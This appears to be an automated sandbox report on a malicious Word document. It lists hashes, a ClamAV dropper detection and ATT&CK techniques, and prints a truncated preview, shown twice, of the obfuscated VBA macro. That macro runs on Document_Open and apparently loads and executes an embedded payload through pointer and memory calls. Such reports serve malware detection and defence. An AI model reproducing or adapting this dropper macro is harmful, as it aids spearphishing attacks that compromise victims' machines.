Office (OLE) malware analysis — malicious · 4679b85d02d95cd7

MALICIOUS

Office (OLE)

181.5 KB Created: 2017-11-02 13:45:00 Authoring application: Microsoft Office Word First seen: 2017-11-13

MD5: 33b161d7a3c850263d88671a90d4e0ae SHA-1: 6bda457ef6fba3d11b8543e26c6b648a156df718 SHA-256: 4679b85d02d95cd7643e7c60b59443447caefaf910dc44b838adbd04135843c1

122 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a large VBA macro. The macro is triggered by the Document_Open event, indicating an attempt to execute malicious code upon opening. The ClamAV detection name 'Doc.Dropper.Agent-6363555-0' suggests its function is to drop and execute a secondary payload. The presence of VBA macros and the Document_Open event strongly suggest a spearphishing attachment attack vector.

Heuristics 4

ClamAV: Doc.Dropper.Agent-6363555-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6363555-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 41747 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	41747 bytes
SHA-256: `59821482979a1e7a429634c449b816a0bb3c6bddbf97abea69955896b7f0caef`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub holcus() Dim europa As Integer Dim perianth As Variant yellowlegs.thermally.Value = Day(#12/5/2013#) varday = refluence = "gall" pollster = "montfort" annihilate = "camisade" disconformity = "irreligious" beatae = "arsonist" allelic = anoint lacewing = electrometer Set clarification = yellowlegs.thermally.SelectedItem bawn = 11 undated = 22862 falsus = 471308 Pmt 0, bawn, 38648, 47302, 8 trio = clarification.Name cordated = 5 - 127 + 7966 zoonosis = Right(trio, cordated) loadstar = azodrak.moldboard(zoonosis) ingeniosa = 56 decoyduck = 20758 lacy = 443491 Pmt 0, ingeniosa, 13556, 19333, 8 glomerular = "doublechinned" bunas = invigilation #If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then Dim immigrant As Variant Dim collier As LongPtr Dim maputo As LongPtr Dim classfellow As Variant #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim lapwing As Variant Dim maputo As Long Dim cheapness As Integer Dim collier As Long #End If amygdalus = 122 - 96 - 26 inbasket = "contrail" contingency = 58 - 33 + 4071 unbloodied = 65 pudendal = 25540 kenyan = 251352 Pmt 0, unbloodied, 29597, 53189, 3 dubitousness = "masonry" harmonic = "incoordination" lancer = becket dismissal = 105 bantling = 28510 preconcerted = 475122 Pmt 0, dismissal, 24406, 54982, 5 exarch = loadstar offputting = "flannelette" bedim = "dogear" collier = balourdise(exarch) bunker = "barony" empale = levin #If (3 * 4 + 5) > (5 - 2 * 1) And (8 - 4 * 2) * 2 < (Win64) Then Dim barbouillage As Long Dim grimy As LongPtr Dim stupefied As LongPtr Dim malaysia As LongPtr iterum = 98 - 101 + 2067 #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim grimy As Long bedwetting = 126 - 103 + 758 Dim stupefied As Long Dim malaysia As Long iterum = bedwetting + 3459 #End If Dim unisonance As Variant Dim firelighter As Integer grimy = 14 - 128 + 114 maputo = collier + iterum stupefied = 128 - 95 + 201494 malaysia = 105 - 78 + 3473 aglet = anoxic(stupefied, _ grimy, _ maputo, _ grimy, _ grimy, _ grimy, grimy) entomophobia = 40 + 6 durum = 22230 + 9 paradoxurus = 301990 + 6 Pmt 0, entomophobia, 25200, 35830, 7 End Sub Function balourdise(girlish) Dim anabiosis As Integer Dim expounding As String Dim butcher As String Dim diplotene As Variant #If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then Dim perilla As Byte Dim defensible As LongPtr scissortail = 114 - 46 - 60 Dim headlong As LongPtr Dim tuning As String Dim bare As Integer Dim louisville As LongPtr Dim bagnio As Byte #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim defensible As Long scissortail = 51 - 54 + 7 Dim headlong As Long Dim louisville As Long #End If kitchen = VarPtr(defensible) depression = mara(kitchen, VarPtr(girlish) + 8, scissortail) morocco = 5 - 46 + 40 headlong = 59 - 118 + 59 chiroptera = 116 - 25 - 91 louisville = 16 - 59 + 9593 continuous = 31 - 32 + 4097 dandle = 9 - 94 + 149 calloused = lives(ByVal morocco, _ headlong, _ ByVal chiroptera, louisville, ByVal continuous, _ ByVal dandle) boarfish = isometry - 456 isometry = isometry Or 494 mara headlong, defensible, 22 - 113 + 5974 ceux = 24 overcharge = 5353 meddle = 418939 Pmt 0, ceux, 37355, 50999, 6 balourdise = headlong End Function Private Sub Document_Open() Dim collectible As Integer Dim keen As Byte cyanamide = "za" holcus neverdying = 109 aplanatic = 12785 radiomicrometer = 313470 Pmt 0, neverdying, 19161, 37219, 6 End Sub Function mara(aegri, chichi, loser) #If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (Win64) Then Dim sprinkle As String Dim different As Variant Dim lemonad ... (truncated)

SHA-256: 59821482979a1e7a429634c449b816a0bb3c6bddbf97abea69955896b7f0caef

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub holcus()
Dim europa As Integer
Dim perianth As Variant
yellowlegs.thermally.Value = Day(#12/5/2013#)
varday = refluence = "gall"
pollster = "montfort"
annihilate = "camisade"
disconformity = "irreligious"
beatae = "arsonist"

allelic = anoint
lacewing = electrometer
Set clarification = yellowlegs.thermally.SelectedItem
bawn = 11
undated = 22862
falsus = 471308
 Pmt 0, bawn, 38648, 47302, 8

trio = clarification.Name
cordated = 5 - 127 + 7966
zoonosis = Right(trio, cordated)
loadstar = azodrak.moldboard(zoonosis)
ingeniosa = 56
decoyduck = 20758
lacy = 443491
 Pmt 0, ingeniosa, 13556, 19333, 8

glomerular = "doublechinned"
bunas = invigilation
#If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim immigrant As Variant
Dim collier As LongPtr
Dim maputo As LongPtr
Dim classfellow As Variant
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim lapwing As Variant
Dim maputo As Long
Dim cheapness As Integer
Dim collier As Long
#End If
amygdalus = 122 - 96 - 26
inbasket = "contrail"
contingency = 58 - 33 + 4071
unbloodied = 65
pudendal = 25540
kenyan = 251352
 Pmt 0, unbloodied, 29597, 53189, 3

dubitousness = "masonry"
harmonic = "incoordination"
lancer = becket
dismissal = 105
bantling = 28510
preconcerted = 475122
 Pmt 0, dismissal, 24406, 54982, 5

exarch = loadstar
offputting = "flannelette"
bedim = "dogear"
collier = balourdise(exarch)
bunker = "barony"
empale = levin
#If (3 * 4 + 5) > (5 - 2 * 1) And (8 - 4 * 2) * 2 < (Win64) Then
Dim barbouillage As Long
Dim grimy As LongPtr
Dim stupefied As LongPtr
Dim malaysia As LongPtr
iterum = 98 - 101 + 2067
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim grimy As Long
bedwetting = 126 - 103 + 758
Dim stupefied As Long
Dim malaysia As Long
iterum = bedwetting + 3459

#End If
Dim unisonance As Variant
Dim firelighter As Integer
grimy = 14 - 128 + 114
maputo = collier + iterum
stupefied = 128 - 95 + 201494
malaysia = 105 - 78 + 3473
aglet = anoxic(stupefied, _
grimy, _
maputo, _
grimy, _
grimy, _
grimy, grimy)
entomophobia = 40 + 6
durum = 22230 + 9
paradoxurus = 301990 + 6
 Pmt 0, entomophobia, 25200, 35830, 7

End Sub

Function balourdise(girlish)
Dim anabiosis As Integer
Dim expounding As String
Dim butcher As String
Dim diplotene As Variant
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim perilla As Byte
Dim defensible As LongPtr
scissortail = 114 - 46 - 60
Dim headlong As LongPtr
Dim tuning As String
Dim bare As Integer
Dim louisville As LongPtr
Dim bagnio As Byte
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim defensible As Long
scissortail = 51 - 54 + 7
Dim headlong As Long
Dim louisville As Long
#End If
kitchen = VarPtr(defensible)
depression = mara(kitchen, VarPtr(girlish) + 8, scissortail)
morocco = 5 - 46 + 40
headlong = 59 - 118 + 59
chiroptera = 116 - 25 - 91
louisville = 16 - 59 + 9593
continuous = 31 - 32 + 4097
dandle = 9 - 94 + 149
calloused = lives(ByVal morocco, _
headlong, _
ByVal chiroptera, louisville, ByVal continuous, _
ByVal dandle)
boarfish = isometry - 456

isometry = isometry Or 494

mara headlong, defensible, 22 - 113 + 5974
ceux = 24
overcharge = 5353
meddle = 418939
 Pmt 0, ceux, 37355, 50999, 6

balourdise = headlong
End Function
Private Sub Document_Open()
Dim collectible As Integer
Dim keen As Byte
cyanamide = "za"
holcus
neverdying = 109
aplanatic = 12785
radiomicrometer = 313470
 Pmt 0, neverdying, 19161, 37219, 6
End Sub
Function mara(aegri, chichi, loser)
#If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (Win64) Then
Dim sprinkle As String
Dim different As Variant
Dim lemonad
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.